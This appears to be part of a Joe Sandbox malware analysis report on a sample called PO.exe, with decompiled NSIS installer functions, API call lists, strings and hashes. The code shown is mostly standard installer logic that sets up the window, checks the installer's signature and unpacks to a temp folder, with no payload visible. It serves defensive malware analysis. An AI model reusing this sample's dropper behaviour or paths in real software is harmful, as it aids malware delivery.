								_push(_t134);
								goto L22;
							}
							SendMessageW(_t128, 0xf3, _t135, _t135);
							_t105 = IsWindowEnabled(_t128);
							__eflags = _t105;
							if(_t105 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t127, _t135, _t135);
						return 1;
					} else {
						DestroyWindow( *0x429218);
						 *0x429218 = _a12;
						L58:
						if( *0x425728 == _t135 &&  *0x429218 != _t135) {
							ShowWindow(_t127, 0xa); // executed
							 *0x425728 = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x00403d73
0x00403d7c
0x00403ebd
0x00403ec1
0x00403ec5
0x00403ec7
0x00403ecc
0x00403ed7
0x00403ee2
0x00403ee7
0x00403ee9
0x00403eeb
0x00403eee
0x00403ef3
0x00403f01
0x00403f0e
0x00403f15
0x00403f15
0x00403f16
0x00403f16
0x00403f1b
0x00403f21
0x00403f28
0x00403f2e
0x00403f30
0x00403f70
0x00403f75
0x00403f7a
0x00403f7a
0x00403f7f
0x00403f88
0x00403f8a
0x00403f8f
0x00403f95
0x00403f99
0x00403f99
0x00403f9e
0x00403fa4
0x00000000
0x00000000
0x00403faf
0x00403fb5
0x00000000
0x00000000
0x00403fbe
0x00403fc6
0x00403fcb
0x00403fce
0x00403fd4
0x00403fd9
0x00403fdc
0x00403fe2
0x00403fe7
0x00403fea
0x00403ff0
0x00403ff8
0x00403ffe
0x00404004
0x00404008
0x0040400f
0x0040400f
0x0040400f
0x00404019
0x0040402b
0x00404037
0x0040403c
0x00404046
0x0040404c
0x0040404e
0x00404053
0x00404050
0x00404050
0x00404050
0x00404063
0x0040407b
0x0040407d
0x00404083
0x00404098
0x00404085
0x0040408e
0x00404090
0x00404090
0x0040409e
0x004040ae
0x004040c4
0x004040cb
0x004040d1
0x004040d5
0x004040da
0x004040dc
0x00000000
0x004040e2
0x004040e2
0x004040e4
0x00000000
0x00000000
0x004040ea
0x004040ee
0x00404113
0x00404119
0x0040411f
0x00404121
0x00000000
0x00000000
0x00404147
0x0040414d
0x0040414f
0x00404154
0x00000000
0x00000000
0x0040415a
0x0040415d
0x00404160
0x00404177
0x00404183
0x0040419c
0x004041a2
0x004041a6
0x004041ab
0x004041b1
0x00000000
0x00000000
0x004041bb
0x004041c6
0x00000000
0x004041c6
0x004040f0
0x004040f6
0x00000000
0x00000000
0x004040fc
0x00404102
0x00000000
0x00000000
0x00000000
0x00404108
0x004040dc
0x004041d3
0x004041df
0x004041e6
0x00000000
0x00403f32
0x00403f32
0x00403f35
0x00403f68
0x00403f68
0x00403f6a
0x00000000
0x00000000
0x00000000
0x00403f6a
0x00403f37
0x00403f3b
0x00403f40
0x00403f42
0x00000000
0x00000000
0x00403f52
0x00403f5a
0x00000000
0x00403f60
0x00403d8e
0x00403d8e
0x00403d92
0x00403d97
0x00403da6
0x00403da6
0x00403daf
0x00403db8
0x00403dc3
0x00403dc3
0x00403dcf
0x00403deb
0x00403dee
0x00403e01
0x00403e07
0x00403eaa
0x00000000
0x00403eb3
0x00403e0d
0x00403e1a
0x00403e1c
0x00403e1e
0x00403e3d
0x00403e3d
0x00403e40
0x00403e45
0x00403e48
0x00403e58
0x00403e59
0x00403e5b
0x00403e91
0x00403ea4
0x00000000
0x00403ea4
0x00403e5d
0x00403e63
0x00403e7c
0x00403e81
0x00403e83
0x00000000
0x00000000
0x00403e85
0x00403e71
0x00403e71
0x00403e73
0x00403e73
0x00000000
0x00403e73
0x00403e66
0x00403e6b
0x00000000
0x00403e6b
0x00403e4a
0x00403e50
0x00000000
0x00000000
0x00403e52
0x00000000
0x00403e52
0x00403e42
0x00000000
0x00403e42
0x00403e28
0x00403e2f
0x00403e35
0x00403e37
0x00000000
0x00000000
0x00000000
0x00403e37
0x00403df3
0x00000000
0x00403dd1
0x00403dd7
0x00403de1
0x004041ec
0x004041f2
0x004041ff
0x00404205
0x00404205
0x0040420f
0x00000000
0x0040420f
0x00403dcf

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403DA6
ShowWindow.USER32(?), ref: 00403DC3
DestroyWindow.USER32 ref: 00403DD7
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DF3
GetDlgItem.USER32(?,?), ref: 00403E14
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E28
IsWindowEnabled.USER32(00000000), ref: 00403E2F
GetDlgItem.USER32(?,00000001), ref: 00403EDD
GetDlgItem.USER32(?,00000002), ref: 00403EE7
SetClassLongW.USER32(?,000000F2,?), ref: 00403F01
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F52
GetDlgItem.USER32(?,00000003), ref: 00403FF8
ShowWindow.USER32(00000000,?), ref: 00404019
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040402B
EnableWindow.USER32(?,?), ref: 00404046
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040405C
EnableMenuItem.USER32(00000000), ref: 00404063
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040407B
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040408E
lstrlenW.KERNEL32(00423728,?,00423728,00429240), ref: 004040B7
SetWindowTextW.USER32(?,00423728), ref: 004040CB
ShowWindow.USER32(?,0000000A), ref: 004041FF

Strings

(7B, xrefs: 004040A3

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: (7B
API String ID: 3282139019-3251261122
Opcode ID: dd9405652fbbb87ab488d8a14d0aeb81f33be68f6094b2cdc8f2b1d388c01c08
Instruction ID: 4530f9416eb169af0d44378ddba5762a1eee688012323a74912104aead4a3b33
Opcode Fuzzy Hash: dd9405652fbbb87ab488d8a14d0aeb81f33be68f6094b2cdc8f2b1d388c01c08
Instruction Fuzzy Hash: A5C1FFB1640200FFCB206F61EE84E2B3AA8EB95745F40057EF641B21F1CB7999529B6D

Uniqueness

Uniqueness Score: -1.00%

Function 004039C7 Relevance: 49.2, APIs: 14, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004039C7(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a250;
				_t22 = E00406558(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423728;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E0040604B(0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423728, 0);
					__eflags =  *0x423728;
					if(__eflags == 0) {
						E0040604B(0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423728, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E004060C5(L"1033", _t73 & 0x0000ffff);
				}
				E00403C9D(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Diakonernes";
				 *0x42a2c0 =  *0x42a258 & 0x00000020;
				 *0x42a2dc = 0x10000;
				if(E00405C3A(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Diakonernes") != 0) {
					L16:
					if(E00405C3A(_t98, _t86) == 0) {
						E004061A0(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x42a240, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429228 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403C9D(_t78, __eflags);
							__eflags =  *0x42a2e0;
							if( *0x42a2e0 != 0) {
								_t33 = E004053B0(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42920c;
								if( *0x42920c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423708, 5); // executed
							_t39 = E004064E8("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004064E8("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x4291e0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x4291e0);
								 *0x429204 = _t87;
								RegisterClassW(0x4291e0);
							}
							_t44 = DialogBoxParamW( *0x42a240,  *0x429220 + 0x00000069 & 0x0000ffff, 0, E00403D6A, 0); // executed
							E00403917(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a240;
						 *0x4291e4 = E00401000;
						 *0x4291f0 =  *0x42a240;
						 *0x4291f4 = _t30;
						 *0x429204 = 0x40a3b4;
						if(RegisterClassW(0x4291e0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423708 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a240, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					if( *(_t82 + 0x48) == 0) {
						goto L16;
					}
					_t76 = 0x4281e0;
					E0040604B( *((intOrPtr*)(_t82 + 0x44)),  *0x42a278 + _t78 * 2,  *0x42a278 +  *(_t82 + 0x4c) * 2, 0x4281e0, 0);
					_t63 =  *0x4281e0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x4281e2;
						 *((short*)(E00405B5F(0x4281e2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040617E(_t86, E00405B32(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405B7E(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x004039cd
0x004039d6
0x004039dd
0x004039df
0x004039f3
0x00403a05
0x00403a0e
0x00403a17
0x00403a1e
0x00403a23
0x00403a2a
0x00403a3d
0x00403a3d
0x00403a48
0x004039e1
0x004039e1
0x004039ec
0x004039ec
0x00403a4d
0x00403a57
0x00403a60
0x00403a65
0x00403a76
0x00403b08
0x00403b10
0x00403b19
0x00403b19
0x00403b2f
0x00403b35
0x00403b43
0x00403bc4
0x00403bcc
0x00403bd6
0x00403bdb
0x00403be1
0x00403c6b
0x00403c70
0x00403c72
0x00403c8e
0x00000000
0x00403c8e
0x00403c74
0x00403c7a
0x00403c82
0x00403c82
0x00000000
0x00403c7a
0x00403bef
0x00403bfa
0x00403bff
0x00403c01
0x00403c08
0x00403c08
0x00403c13
0x00403c1b
0x00403c1d
0x00403c1f
0x00403c28
0x00403c2b
0x00403c31
0x00403c31
0x00403c50
0x00403c61
0x00000000
0x00403c66
0x00403bce
0x00403bd0
0x00000000
0x00403b45
0x00403b45
0x00403b51
0x00403b5b
0x00403b61
0x00403b66
0x00403b75
0x00403c93
0x00403c93
0x00000000
0x00403c93
0x00403b84
0x00403bbf
0x00000000
0x00403bbf
0x00403a7c
0x00403a7c
0x00403a81
0x00000000
0x00000000
0x00403a8f
0x00403aa1
0x00403aa6
0x00403aaf
0x00000000
0x00000000
0x00403ab5
0x00403ab7
0x00403ac4
0x00403ac4
0x00403acd
0x00403ad3
0x00403afb
0x00403b03
0x00000000
0x00403ae5
0x00403ae6
0x00403aef
0x00403af5
0x00403af6
0x00000000
0x00403af6
0x00403af1
0x00403af3
0x00000000
0x00000000
0x00000000
0x00403af3
0x00403ad3

APIs

Part of subcall function 00406558: GetModuleHandleA.KERNEL32(?,00000020,?,0040341F,00000009), ref: 0040656A
Part of subcall function 00406558: GetProcAddress.KERNEL32(00000000,?), ref: 00406585

GetUserDefaultUILanguage.KERNELBASE(00000002,77373420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO.exe",00000000), ref: 004039E1

Part of subcall function 004060C5: wsprintfW.USER32 ref: 004060D2

lstrcatW.KERNEL32(1033,00423728), ref: 00403A48
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,77373420), ref: 00403AC8
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403ADB
GetFileAttributesW.KERNEL32(Call), ref: 00403AE6
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes), ref: 00403B2F
RegisterClassW.USER32(004291E0), ref: 00403B6C
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B84
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403BB9
ShowWindow.USER32(00000005,00000000), ref: 00403BEF
GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403C1B
GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403C28
RegisterClassW.USER32(004291E0), ref: 00403C31
DialogBoxParamW.USER32(?,00000000,00403D6A,00000000), ref: 00403C50

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes, xrefs: 00403A57, 00403A5F, 00403B02, 00403B08, 00403B18
"C:\Users\user\Desktop\PO.exe", xrefs: 004039CB
C:\Users\user\AppData\Local\Temp\, xrefs: 004039CC
RichEd20, xrefs: 00403BF5
(7B, xrefs: 004039F3
1033, xrefs: 004039E7, 00403A43
RichEdit20W, xrefs: 00403C13, 00403C19
Control Panel\Desktop\ResourceLocale, xrefs: 004039FB
RichEdit, xrefs: 00403C22
_Nb, xrefs: 00403B4B, 00403BB3
.exe, xrefs: 00403AD5
RichEd32, xrefs: 00403C03
Call, xrefs: 00403A8F, 00403A98, 00403AA6, 00403AF5, 00403AFB
.DEFAULT\Control Panel\International, xrefs: 00403A33

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\PO.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-1753125097
Opcode ID: d6eb97ecc45ceecdb0e2d203f76fda1198e4e833a1627c35b81ac0c75580ce77
Instruction ID: e7f44595d902892b35b801f2f0c3734befc0b18a393fec54347386a87508d522
Opcode Fuzzy Hash: d6eb97ecc45ceecdb0e2d203f76fda1198e4e833a1627c35b81ac0c75580ce77
Instruction Fuzzy Hash: 8661C570244200BAD730AF669D49E2B3A7CEB84B49F40453FF981B62E2DB7D5912C63D

Uniqueness

Uniqueness Score: -1.00%

Function 00402E41 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E00402E41(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x42a24c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\PO.exe", 0x400);
				_t105 = E00405D53(L"C:\\Users\\Arthur\\Desktop\\PO.exe", 0x80000000, 3);
				 *0x40a018 = _t105;
				if(_t105 == 0xffffffff) {
					return L"Error launching installer";
				}
				E0040617E(L"C:\\Users\\Arthur\\Desktop", L"C:\\Users\\Arthur\\Desktop\\PO.exe");
				E0040617E(0x439000, E00405B7E(L"C:\\Users\\Arthur\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x418ee0 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402D9F(1);
					__eflags =  *0x42a254;
					if( *0x42a254 == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00406677(0x40ce48);
						E00405D82(0x40ce48,  &_v560, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E0040336E( *0x42a254 + 0x1c);
							 *0x418ee4 = _t65;
							 *0x418ed8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E004030E7(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x42a250 = _t110;
								 *0x42a258 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a25c =  *0x42a25c + 1;
									__eflags =  *0x42a25c;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x418ed4; // 0x3408c
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E00405D0E(0x42a260, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E0040336E( *0x418ed0);
					_t77 = E00403358( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a254) & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E00403358(0x418ee8, _t106);
						__eflags = _t83;
						if(_t83 == 0) {
							E00402D9F(1);
							L30:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42a254;
						if( *0x42a254 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402D9F(0);
							}
							goto L19;
						}
						E00405D0E( &_v40, 0x418ee8, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x418ed0; // 0x20cee
						 *0x42a2e0 =  *0x42a2e0 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x42a254 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x418ee0; // 0x25361
						if(__eflags < 0) {
							_v8 = E00406609(_v8, 0x418ee8, _t106);
						}
						 *0x418ed0 =  *0x418ed0 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}

0x00402e4f
0x00402e52
0x00402e6c
0x00402e71
0x00402e84
0x00402e89
0x00402e8f
0x00000000
0x00402e91
0x00402ea2
0x00402eb3
0x00402eba
0x00402ec0
0x00402ec2
0x00402ec7
0x00402ec9
0x00402fb9
0x00402fbb
0x00402fc0
0x00402fc7
0x00000000
0x00000000
0x00402fcd
0x00402fd0
0x00402ffc
0x00403001
0x0040300c
0x0040300e
0x0040301f
0x0040303a
0x00403040
0x00403043
0x00403048
0x00403067
0x00403077
0x00403089
0x0040308e
0x00403093
0x00403096
0x0040309f
0x004030a3
0x004030ab
0x004030b0
0x004030b2
0x004030b2
0x004030b2
0x004030ba
0x004030ba
0x004030bd
0x004030be
0x004030be
0x004030c1
0x004030c3
0x004030c3
0x004030c3
0x004030c6
0x004030cd
0x004030d9
0x004030de
0x00000000
0x004030de
0x00000000
0x00403096
0x00000000
0x0040304a
0x00402fd8
0x00402fe3
0x00402fe8
0x00402fea
0x00000000
0x00000000
0x00402ff3
0x00402ff6
0x00000000
0x00000000
0x00000000
0x00402ecf
0x00402ecf
0x00402ed4
0x00402ed8
0x00402edf
0x00402ee4
0x00402ee6
0x00402ee8
0x00402ee8
0x00402ef0
0x00402ef5
0x00402ef7
0x00403056
0x00403098
0x00000000
0x00403098
0x00402efd
0x00402f03
0x00402f83
0x00402f87
0x00402f8a
0x00402f8f
0x00000000
0x00402f87
0x00402f10
0x00402f15
0x00402f18
0x00402f1d
0x00000000
0x00000000
0x00402f1f
0x00402f26
0x00000000
0x00000000
0x00402f28
0x00402f2f
0x00000000
0x00000000
0x00402f31
0x00402f38
0x00000000
0x00000000
0x00402f3a
0x00402f41
0x00000000
0x00000000
0x00402f43
0x00402f49
0x00402f52
0x00402f58
0x00402f5b
0x00402f5d
0x00402f63
0x00000000
0x00000000
0x00402f69
0x00402f6d
0x00402f75
0x00402f75
0x00402f78
0x00402f7b
0x00402f7d
0x00402f7f
0x00402f7f
0x00000000
0x00402f7d
0x00402f6f
0x00402f73
0x00000000
0x00000000
0x00000000
0x00402f90
0x00402f90
0x00402f96
0x00402fa6
0x00402fa6
0x00402fa9
0x00402faf
0x00402fb1
0x00402fb1
0x00000000
0x00402ecf

APIs

GetTickCount.KERNEL32 ref: 00402E55
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO.exe,00000400), ref: 00402E71

Part of subcall function 00405D53: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\PO.exe,80000000,00000003), ref: 00405D57
Part of subcall function 00405D53: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D79

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO.exe,C:\Users\user\Desktop\PO.exe,80000000,00000003), ref: 00402EBA
GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403001

Strings

"C:\Users\user\Desktop\PO.exe", xrefs: 00402E41
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040304A
C:\Users\user\AppData\Local\Temp\, xrefs: 00402E4B, 00403019
Error launching installer, xrefs: 00402E91
Null, xrefs: 00402F3A
Inst, xrefs: 00402F28
soft, xrefs: 00402F31
C:\Users\user\Desktop, xrefs: 00402E9C, 00402EA1, 00402EA7
C:\Users\user\Desktop\PO.exe, xrefs: 00402E5B, 00402E6A, 00402E7E, 00402E9B
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403098

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\PO.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PO.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-1940601522
Opcode ID: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
Instruction ID: e866f1dd798e5fb15c0a347603bcfded6ce2f229c2e481af73dd86df93422dd6
Opcode Fuzzy Hash: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
Instruction Fuzzy Hash: 9761C431A00215ABDB209F75DD49B9E7BB8EB00359F20817FF500F62D1DABD9A448B5D

Uniqueness

Uniqueness Score: -1.00%

